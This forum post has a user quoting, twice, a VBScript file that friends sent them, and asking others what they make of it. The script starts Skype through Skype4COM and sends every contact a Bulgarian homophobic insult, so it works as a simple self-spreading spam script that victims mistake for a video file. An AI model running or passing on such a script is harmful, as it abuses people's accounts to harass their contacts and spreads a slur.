QUOTE
on error resume next
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Аз съм тъп Гей"
next
msgbox "by Moradyn"
Look what i keep recieving from friends in file with format .vbs ( thought thats video format ?? )set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Аз съм тъп Гей"
next
msgbox "by Moradyn"
"Аз съм тъп Гей" here they can put whatever they want and when you give it permission it start spamming your contacts . Its really annoying if they put some swear ( like that i've posted but its in Bulgarian )
What you think of this ?